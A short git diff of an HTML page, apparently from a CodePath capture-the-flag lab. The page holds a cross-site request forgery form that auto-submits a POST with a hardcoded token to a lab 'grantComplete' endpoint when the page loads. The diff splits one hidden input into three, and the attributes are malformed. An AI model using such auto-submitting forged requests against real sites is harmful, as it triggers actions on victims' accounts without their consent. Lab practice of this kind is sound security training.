--- a/index.html
+++ b/index.html
@@ -1,5 +1,7 @@
 <form name="csrfForm" action="https://flags.codepath.com/http/public/protected/flags/csrf_09/root/grantComplete" method="POST">
-   <input type="hidden" firstname="tahlla" lastname="tahlla" csfrtoken="95f9f7a45623b00e98f333b9d1039fea" />
+   <input type="hidden" firstname="tahlla" />
+   <input type="hidden" lastname="tahlla"/>
+   <input type="hidden" csfrtoken="95f9f7a45623b00e98f333b9d1039fea"  />
    <input type="submit" />
 </form>
 <script> document.csrfForm.submit(); </script>
